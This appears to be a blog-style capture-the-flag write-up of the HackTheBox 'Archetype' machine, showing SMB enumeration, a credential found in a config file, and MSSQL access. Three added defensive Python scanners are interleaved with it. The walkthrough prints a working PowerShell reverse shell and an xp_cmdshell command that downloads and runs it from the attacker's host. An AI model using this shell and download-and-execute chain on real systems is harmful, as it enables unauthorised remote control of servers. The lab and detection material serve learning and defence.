Going to start some hackthebox to learn more stuff. While I have skills in the detection area, working with Netflow and DNS, I don’t have a strong offensive mindset. Perhaps that will be beneficial, thinking in terms of offense to develop a better defense.
Set the ports to scan (full port sweep, then collect the open port numbers into a comma-separated list):
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
Perform an nmap service and default-script scan against the target on the discovered ports:
nmap -sC -sV -p$ports 10.10.10.27
We can see that ports 135, 139, 445 and 1433 are open.

Port 135 is the Microsoft RPC endpoint mapper.
Ports 139 and 445 are the SMB service.
Port 1433 is the Microsoft SQL Server (MSSQL) service.
Connecting to the SMB service
We call smbclient to list the available shares.

We then access the backups share, see what files are inside, and download the file called prod.dtsConfig.

Analyzing prod.dtsConfig
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
We see the credentials Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc in the connection string, most likely for the SQL connection.
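From the detection side, the lesson of this file is that SSIS package configurations on a readable share can carry database passwords in clear text. The scanner below is an added example, not code from the write-up: it parses DTSConfiguration XML, pulls every ConnectionString property, and reports the ones that embed a Password= (or Pwd=) token, masking the secret so the report itself is safe to hand around. The sample XML mirrors the prod.dtsConfig shown above plus a second, constructed connection that uses integrated authentication so the scanner has a clean case to ignore.

```python
"""Flag SSIS .dtsConfig files that embed plaintext database passwords.

Added example (not from the write-up). Walks DTSConfiguration XML, extracts
each ConnectionString property and reports those carrying a Password=/Pwd=
token. The secret is masked in the output.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the first connection is the one from the write-up, the
# second is an invented one using Integrated Security (no password to leak).
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;Provider=SQLNCLI10.1;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
"""


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value;' into a dict keyed by lower-cased names."""
    pairs = {}
    for part in value.split(";"):
        if "=" not in part:
            continue
        key, _, val = part.partition("=")
        pairs[key.strip().lower()] = val.strip()
    return pairs


def connection_strings(xml_text):
    """Yield (package path, parsed connection string) for every
    ...Properties[ConnectionString] entry in the configuration."""
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):
        path = conf.get("Path", "")
        if not path.endswith("Properties[ConnectionString]"):
            continue
        node = conf.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        yield path, parse_connection_string(node.text)


def mask(secret):
    """Keep the first character only, so findings can be shared safely."""
    return secret[0] + "*" * (len(secret) - 1) if secret else ""


def find_plaintext_passwords(xml_text):
    """Return one finding per connection string that stores a password."""
    findings = []
    for path, pairs in connection_strings(xml_text):
        password = pairs.get("password") or pairs.get("pwd")
        if not password:
            continue
        findings.append({
            "path": path,
            "user": pairs.get("user id") or pairs.get("uid", "<none>"),
            "data_source": pairs.get("data source", "<none>"),
            # True means the driver keeps the password in the connection
            # object after connecting, which widens where it can be read from.
            "persist_security_info":
                pairs.get("persist security info", "").lower() == "true",
            "password_masked": mask(password),
        })
    return findings


if __name__ == "__main__":
    for f in find_plaintext_passwords(SAMPLE_DTSCONFIG):
        print(f"[!] plaintext password for {f['user']} at {f['path']} "
              f"-> {f['password_masked']} (persist={f['persist_security_info']})")
```

Point it at every *.dtsConfig reachable from file shares and backup directories; a connection string using Integrated Security=SSPI instead of a stored password is the fix for the finding, not masking the file.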
Accessing SQL
Earlier we saw that port 1433 was open, and now we try to connect to it with the credentials we found.
We use Impacket's mssqlclient.py to connect to the SQL server.

We then check whether the sql_svc user holds the sysadmin server role.

Creating a Powershell reverse shell
shell.ps1
Remember to change the IP address to your VPN address
$client = New-Object System.Net.Sockets.TCPClient(<IPADDRESS>,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
We set up a Python3 web server so the victim can download the shell script:
python3 -m http.server 80
We then set up an nc listener to wait for the victim to execute the shell script and call back to us:
nc -lvnp 443
We modify our firewall rules to allow the victim to connect to us on port 80 to download the shell, and port 443 for the reverse connection
ufw allow from 10.10.10.27 proto tcp to any port 80,443
Over at the victim end, in the SQL server session, we run the command to download and execute the shell script:
xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\")"
The nc listener should now receive a connection from the victim to port 443, and you have a shell!
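Seen from the NetFlow side the author works with, this chain has a recognisable shape: a client connects to the SQL host on TCP/1433, and a minute later the SQL host opens outbound connections back to that same client on 80 and 443. A database server initiating sessions to one of its own recent clients is rare in normal traffic and is a good alert candidate. The detector below is an added example, not part of the write-up; the flow records are constructed five-tuples with the addresses used in this walkthrough, and the port list and time window are assumptions you would tune for your own environment.

```python
"""Spot a database server calling back to a client that just connected to it.

Added example (not part of the write-up). Pairs inbound sessions to a
monitored service port with later outbound flows from that server to the
same peer, and raises an alert when they fall within a time window.
"""
from collections import defaultdict

SERVER_PORTS = {1433}      # assumption: services expected only to accept sessions
CALLBACK_WINDOW = 600      # assumption: seconds after the inbound session to watch

# Constructed NetFlow-style records: (epoch seconds, src ip, src port, dst ip, dst port)
FLOWS = [
    (1000, "10.10.14.3",  49812, "10.10.10.27", 1433),  # mssqlclient login
    (1015, "10.10.14.50", 50331, "10.10.10.27", 1433),  # ordinary client, no callback
    (1060, "10.10.10.27", 49153, "10.10.14.3",  80),    # shell.ps1 download
    (1062, "10.10.10.27", 49154, "10.10.14.3",  443),   # reverse shell
    (1070, "10.10.10.27", 49155, "10.10.10.5",  53),    # DNS to a resolver, not a client
    (3000, "10.10.10.27", 49160, "10.10.14.50", 443),   # same peer, but outside the window
]


def find_callbacks(flows, server_ports=SERVER_PORTS, window=CALLBACK_WINDOW):
    """Return alerts for server->client flows that follow a client->server
    session on a monitored port within `window` seconds."""
    inbound = defaultdict(list)   # (server ip, client ip) -> [(ts, server port)]
    alerts = []
    for ts, src, sport, dst, dport in sorted(flows):
        if dport in server_ports:
            # Client reaching a monitored service: remember who and when.
            inbound[(dst, src)].append((ts, dport))
            continue
        # Any other flow: is the source a server that this peer recently used?
        for in_ts, in_port in inbound.get((src, dst), []):
            if 0 <= ts - in_ts <= window:
                alerts.append({
                    "server": src, "client": dst,
                    "inbound_port": in_port, "callback_port": dport,
                    "delay_s": ts - in_ts,
                })
                break
    return alerts


if __name__ == "__main__":
    for a in find_callbacks(FLOWS):
        print(f"[ALERT] {a['server']} -> {a['client']}:{a['callback_port']} "
              f"{a['delay_s']}s after {a['client']} connected to TCP/{a['inbound_port']}")
```

The same rule generalises to any service that should never dial out (SMB, RDP, LDAP): add the port to SERVER_PORTS. Hosts that legitimately do both, such as a SQL server that also pulls updates from a client subnet, need an allow-list keyed on (server, destination port) before the alert is useful.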
Accessing the user flag
We can list files and print their contents. Here, we access the flag on the sql_svc user's Desktop.

But we want to get the admin flag.
Getting Admin Flag
Using the netcat shell, we read the PowerShell history, and we find the command that mounted the backups share as administrator, with the password typed inline.
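The administrator password surfaces here because a `net use` command was typed with the password on the command line and PSReadLine kept it in ConsoleHost_history.txt. Auditing those history files for inline credentials is a cheap defensive check. The scanner below is an added example, not from the write-up: it reads history-style lines and reports commands that pass a password inline (`net use ... /user:NAME PASSWORD`, `cmdkey ... /pass:`), masking the secret. The sample lines and every password in them are constructed; the share name and account follow the walkthrough.

```python
"""Audit PSReadLine history lines for commands that embed credentials.

Added example (not from the write-up). Matches `net use` and `cmdkey`
invocations that carry a password inline and reports them with the secret
masked. A trailing '*' on net use means "prompt for it" and is not a leak.
"""
import re

# Constructed sample in the style of ConsoleHost_history.txt; all passwords are invented.
SAMPLE_HISTORY = """\
Get-ChildItem C:\\Users\\sql_svc\\Desktop
net.exe use T: \\\\Archetype\\backups /user:administrator EXAMPLE_P4ss!
net use S: \\\\fs01\\share /user:corp\\backup *
exit
cmdkey /add:fileserver /user:svc_backup /pass:EXAMPLE_S3cret
Get-Process
"""

PATTERNS = [
    # net use <drive> <share> /user:<name> <password>
    ("net use", re.compile(
        r"^\s*net(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>\S+)", re.I)),
    # cmdkey /add:<target> /user:<name> /pass:<password>
    ("cmdkey", re.compile(
        r"^\s*cmdkey\b.*?/user:(?P<user>\S+).*?/pass:(?P<secret>\S+)", re.I)),
]


def mask(secret):
    """Keep the first character only, so the report can be shared."""
    return secret[0] + "*" * (len(secret) - 1) if secret else ""


def scan_history(text):
    """Return one finding per history line that carries an inline password."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in PATTERNS:
            m = pattern.search(line)
            if not m or m.group("secret") == "*":
                continue
            findings.append({
                "line": lineno,
                "kind": kind,
                "user": m.group("user"),
                "secret_masked": mask(m.group("secret")),
            })
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['kind']} as {f['user']} -> {f['secret_masked']}")
```

Run it over each user's AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt; any hit means rotating that password, not just deleting the history line.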

With that information, we run Impacket's psexec.py and get a shell as the administrator account.

We then navigate to the desktop and grab the flag, and we’re done!
